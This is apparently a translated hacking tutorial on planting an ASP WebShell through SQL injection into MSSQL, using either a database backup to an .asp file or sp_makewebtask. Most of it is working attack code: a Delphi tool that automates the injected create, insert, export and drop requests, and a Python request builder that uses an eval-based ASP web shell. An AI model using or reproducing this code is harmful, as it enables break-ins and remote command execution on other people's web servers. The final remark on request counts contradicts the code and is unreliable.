One. The principle: obtaining a WebShell through SQL injection
n.e.v.e.r's method: obtain the WebShell with the database backup function. Create a table, give it a field that holds the Trojan (the ASP shell text), use MSSQL's BACKUP DATABASE to dump the whole database to a file, and finally drop the new table.

Analysis: n.e.v.e.r's method relies on the MSSQL backup feature. The database is backed up to disk under a file name ending in .asp, and the path is placed inside the web root. The ASP engine interprets any <% ... %> block it finds in the file, and the backup contains the rows we inserted, so the file works as a WebShell. The catch is that the backup also contains every other page of the database: if existing data happens to contain a <% sequence, or the bytes around our block do not parse, the exported .asp file will be broken. The chance of that is not large, but it exists. Two more things to keep in mind: the file is written by the SQL Server service account, which therefore needs write permission on the web directory, and the file is as large as the database itself, not just the shell.
Now let's look at CZY's method.

CZY's method: almost the same as n.e.v.e.r's, except that the export is done with the stored procedure sp_makewebtask. This procedure (one of the Web Assistant procedures of SQL Server 7 and 2000; it is disabled by default in SQL Server 2005 and removed afterwards) writes the result of a query to a file as an HTML page. The problem above does not arise here: we only read the one field of the one table we created, and that field contains nothing but what we inserted. So check the INSERTs first; if the data went in correctly, the export will certainly be correct. Execute permission on sp_makewebtask defaults to sysadmin and db_owner, so the account behind the injection needs one of those roles.
I tested both methods by hand: exploit the SQL injection, create the table, add the data to the table, export the data, then drop the table, all with SQL statements. I won't say more about that here; see the other article in this issue.
Two. Implementing the above in Delphi

With the principle analyzed, how do we get Delphi to do what we just did by hand? The method is simple. Delphi ships the NMHTTP control (from the NetMasters FastNet components); we use it to submit parameters to a given URL, which gives us automatic injection. One characteristic of this program, which you could also call a defect, needs explaining: it does not try to guess the absolute path of the web root, and it does not check the privileges of the current SQL database account. Why not? Because both are very hard to do reliably, so we leave them out. If a run is not successful, go and check whether the file was actually generated.
Three. Obtaining the WebShell with the Delphi program

First the values the program needs: the URL (the injectable address); the absolute path of the remote web root (obtained by other means); which of the two methods to use; a button to start the commands and a button to stop them; and finally the name of the temporary table, its field name and the field type. The first items go on the main form as input controls; the table options live on a separate settings form, opened with a Settings button, and are kept in a record.

Place three Edit controls on the main form, named URLEt (the URL input box), ShellPathEt (the remote path where the Trojan file is written) and CustomBdoorEt (the location of a custom Trojan file). Add two RadioButtons to choose the export method, captioned "Backup Database" (named BKData) and "Web Task", plus a control named DefBdoor (check box or radio button) that selects the default Trojan file shipped beside the program instead of a custom one; the code below refers to all of these. Then add three SpeedButtons named Setting, Start and Stop, and a Memo control that shows progress. That completes the interface, which looks like the figure:
Now let's write the code.

First define a record:

type
  SetOption = record
    TableName: string;  // name of the table to create
    FieldName: string;  // name of the field to create
    FieldType: string;  // type of the field to create
  end;
The FieldType value must be one of the MSSQL column types: bigint, binary, bit, char, datetime, decimal, float, image, int, money, nchar, ntext, numeric, nvarchar, real, smalldatetime, smallint, smallmoney, sql_variant, text, timestamp, tinyint, uniqueidentifier, varbinary, varchar. Since the Trojan is inserted as string literals, only a character type (text, ntext, varchar, nvarchar, char, nchar) is actually useful; the default is text.
Then the global variables:

var
  SOption: SetOption;  // the current settings; defaults are assigned in FormCreate
  IsStop: Boolean;     // set when the user presses the Stop button
In the main form's OnCreate event we give the record its default values:

procedure TMainForm.FormCreate(Sender: TObject);
begin
  SOption.TableName := 'cyfd';
  SOption.FieldName := 'gmemo';
  SOption.FieldType := 'text';
end;
Now the code behind the Start button. Declare BDoorList: TStringList, which holds the lines of the Trojan file, a loop counter i: Integer, and two string variables URL and ShellPath that take the values of URLEt.Text and ShellPathEt.Text so the calls below stay short.
Before the program starts executing we have to check the user's input. Define a CheckInput method on the main form:

function TMainForm.CheckInput: Boolean;
begin
  Result := False;
  if Trim(URLEt.Text) = '' then
  begin
    Application.MessageBox('Please enter the URL address!', 'Prompt', MB_OK + MB_ICONINFORMATION);
    Exit;
  end;
  if Trim(ShellPathEt.Text) = '' then
  begin
    Application.MessageBox('Please enter the path where the file is to be saved!', 'Prompt', MB_OK + MB_ICONINFORMATION);
    Exit;
  end;
  if DefBdoor.Checked then
  begin
    // the default Trojan file lives next to the executable
    if not FileExists(ExtractFilePath(Application.ExeName) + 'default Trojan.txt') then
    begin
      Application.MessageBox('Could not find the [default Trojan.txt] file!', 'Prompt', MB_OK + MB_ICONINFORMATION);
      Exit;
    end;
  end
  else
    if not FileExists(CustomBdoorEt.Text) then
    begin
      Application.MessageBox('Could not find the selected Trojan file!', 'Prompt', MB_OK + MB_ICONINFORMATION);
      Exit;
    end;
  Result := True;
end;
At the beginning of the Start button's click event add:

  if not CheckInput then Exit;  // leave the handler if the input is not valid
If the input is fine, the handler continues. Set IsStop to False, create the list and load the Trojan into it (the default file when DefBdoor is checked, otherwise the custom file):

  IsStop := False;
  BDoorList := TStringList.Create;
  if DefBdoor.Checked then
    BDoorList.LoadFromFile(ExtractFilePath(Application.ExeName) + 'default Trojan.txt')
  else
    BDoorList.LoadFromFile(CustomBdoorEt.Text);

One thing to keep in mind: when data is submitted through NMHTTP, special characters must be encoded, otherwise the data does not arrive. We replace the % sign and spaces with %25 and %20, and the order matters: % first, otherwise the % introduced by %20 would be encoded a second time.

  BDoorList.Text := StringReplace(BDoorList.Text, '%', '%25', [rfReplaceAll]);
  BDoorList.Text := StringReplace(BDoorList.Text, ' ', '%20', [rfReplaceAll]);

Only these two characters are handled. Other characters that are special in a URL (+, &, #, ?) pass through unencoded, and a single quote inside the Trojan text would end the SQL string literal unless it is doubled, so the Trojan line should avoid them.
Next we submit the statement that creates the table. URL is the injectable address up to the injection point; the SQL is simply appended to it, so the injection point must allow a stacked statement (for example the original parameter value followed by a semicolon):

  Memo.Lines.Add('Creating table ...');
  Memo.Lines.Add('');
  NMHTTP.Get(URL + 'CREATE%20TABLE%20[dbo].[' + SOption.TableName + ']%20([' + SOption.FieldName + ']%20[' + SOption.FieldType + ']);');
That creates the table. Then we add the records, one line of the Trojan per INSERT:

  Memo.Lines.Add('Adding data ...');
  Memo.Lines.Add('');
  for i := 0 to BDoorList.Count - 1 do  // loop over the Trojan lines and put them into the table
  begin
    if IsStop then  // the user pressed Stop: abandon the task
    begin
      BDoorList.Free;
      Exit;
    end;
    NMHTTP.Get(URL + 'INSERT%20INTO%20' + SOption.TableName + '%20(' + SOption.FieldName + ')%20VALUES%20(''' + BDoorList.Strings[i] + ''');');
    Memo.Lines.Add('Added line ' + IntToStr(i + 1));
  end;

The rows are later read back without an ORDER BY. On a freshly created table they normally come out in insertion order, but nothing guarantees it; a Trojan that fits on a single line avoids the question altogether.
Now export the data to generate the Trojan file:

  Memo.Lines.Add('Exporting data ...');
  Memo.Lines.Add('');
  if BKData.Checked then  // backup-database method
    NMHTTP.Get(URL + 'DECLARE%20@a%20sysname;select%20@a=db_name();backup%20database%20@a%20to%20disk=''' + ShellPath + '''')
  else  // web task method
    NMHTTP.Get(URL + 'EXECUTE%20sp_makewebtask%20@outputfile=''' + ShellPath + ''',@query=''SELECT%20' + SOption.FieldName + '%20FROM%20' + SOption.TableName + '''');

ShellPath is appended unencoded, so if the web path contains spaces apply the same replacement to it. Finally drop the table we created:

  NMHTTP.Get(URL + 'DROP%20TABLE%20[dbo].[' + SOption.TableName + '];');
The task is complete. Release the list:

  BDoorList.Free;

The Stop button's click event needs a single line:

  IsStop := True;
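To show the whole sequence end to end, here is an added example in Python. It is not the article's Delphi tool and not n.e.v.e.r's or CZY's code: it builds the injected T-SQL for both export methods of section One (BACKUP DATABASE and sp_makewebtask) in the same order as the Start handler above, and percent-encodes each statement for a GET request, but handles quotes and the other reserved characters the Delphi code leaves alone. The base URL, table and field names, web path and ASP one-liner are made-up values for illustration.

```python
# Added example in Python, not the article's Delphi tool: build the injected
# T-SQL for both export methods and percent-encode it for a GET request.
# All names below (URL, table, field, web path, ASP line) are made-up values.
from typing import List
from urllib.parse import quote


def sql_literal(value: str) -> str:
    """Wrap value as a T-SQL string literal, doubling embedded single quotes.
    (The Delphi code wraps each line in '...' without doubling, so a Trojan
    line containing a quote would break its INSERT.)"""
    return "'" + value.replace("'", "''") + "'"


def build_statements(method: str, table: str, field: str, field_type: str,
                     shell_path: str, payload_lines: List[str]) -> List[str]:
    """Return the ordered statements to inject: create the temporary table,
    insert the shell one line per row, export it, drop the table.
    method is 'backup' (n.e.v.e.r) or 'webtask' (CZY)."""
    if method not in ("backup", "webtask"):
        raise ValueError("method must be 'backup' or 'webtask'")
    stmts = [f"CREATE TABLE [dbo].[{table}] ([{field}] [{field_type}])"]
    for line in payload_lines:
        stmts.append(f"INSERT INTO [dbo].[{table}] ([{field}]) "
                     f"VALUES ({sql_literal(line)})")
    if method == "backup":
        # Dump the whole current database into a .asp file under the web root.
        # The file also carries every other page of the database; the ASP
        # engine only needs to find our <% ... %> block, and chokes if some
        # other data happens to contain a stray <% (the caveat in section One).
        stmts.append("DECLARE @a sysname; SELECT @a = db_name(); "
                     f"BACKUP DATABASE @a TO DISK = {sql_literal(shell_path)}")
    else:
        # sp_makewebtask writes only the result of @query (as an HTML page)
        # to @outputfile, so nothing but our own rows ends up in the file.
        query = f"SELECT [{field}] FROM [dbo].[{table}]"
        stmts.append("EXECUTE sp_makewebtask "
                     f"@outputfile = {sql_literal(shell_path)}, "
                     f"@query = {sql_literal(query)}")
    stmts.append(f"DROP TABLE [dbo].[{table}]")
    return stmts


def encode_statement(stmt: str) -> str:
    """Percent-encode a statement for a query string.  The Delphi tool only
    replaces ' ' and '%'; safe='' also encodes '[', ']', '=', '@', ';', quotes
    and anything else a web server or ASP page would otherwise mangle."""
    return quote(stmt, safe="")


def build_requests(base_url: str, stmts: List[str]) -> List[str]:
    """One GET URL per statement, appended to the injectable parameter.
    base_url must end at the injection point in a way that lets MSSQL run
    a stacked statement, e.g. '...?id=1;'."""
    return [base_url + encode_statement(s) for s in stmts]


if __name__ == "__main__":
    # Constructed sample input: a made-up injectable URL and ASP one-liner.
    base = "http://target.example/show.asp?id=1;"
    shell = ['<%eval request("cmd")%>']
    for method in ("backup", "webtask"):
        print(f"--- {method} ---")
        for url in build_requests(base, build_statements(
                method, "cyfd", "gmemo", "text",
                r"c:\inetpub\wwwroot\x.asp", shell)):
            print(url)
```

Running it prints the four requests of the web task method and the three of the backup method (no INSERT is needed for the backup variant's empty payload list only in the test; with a shell line it is four as well). The encoding step is what the Delphi version does with StringReplace, generalized with quote(..., safe="") so that the brackets, the @ and the quotes in the statements survive the trip through the web server.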
The main form is essentially done. Now the settings form, which is simple: the record is already defined in the main form's unit, so we only need to take the new values the user enters and assign them to the record.

Add the main form's unit to the settings form's uses clause. Then put two Edit controls on the form:

The first, TableNameEt, holds the table name entered by the user.
The second, FieldNameEt, holds the field name entered by the user.

Add a ComboBox named FieldTypeCombox, filled with the type names listed above, for the field type the user selects. The interface looks like this:
Define a procedure on the main form that shows the settings form, copying the current values into it first:

procedure TMainForm.ShowSet;
begin
  Application.CreateForm(TSetForm, SetForm);
  with SetForm do
  begin
    TableNameEt.Text := SOption.TableName;
    FieldNameEt.Text := SOption.FieldName;
    FieldTypeCombox.ItemIndex := FieldTypeCombox.Items.IndexOf(SOption.FieldType);
  end;
  SetForm.ShowModal;
  SetForm.Free;
end;
Call ShowSet from the Setting button's click event on the main form.

Here is the code behind the settings form's OK button:

procedure TSetForm.OKBtnClick(Sender: TObject);
begin
  if CheckInput then
  begin
    SOption.TableName := Trim(TableNameEt.Text);  // copy the user's input into the record
    SOption.FieldName := Trim(FieldNameEt.Text);
    SOption.FieldType := FieldTypeCombox.Text;
    Close;
  end;
end;
The settings form has its own CheckInput that verifies the entered values are valid:

function TSetForm.CheckInput: Boolean;
begin
  Result := False;
  if Trim(TableNameEt.Text) = '' then
  begin
    Application.MessageBox('Please enter a temporary table name!', 'Prompt', MB_OK + MB_ICONINFORMATION);
    Exit;
  end;
  if Trim(FieldNameEt.Text) = '' then
  begin
    Application.MessageBox('Please enter the field name!', 'Prompt', MB_OK + MB_ICONINFORMATION);
    Exit;
  end;
  Result := True;
end;
That's all.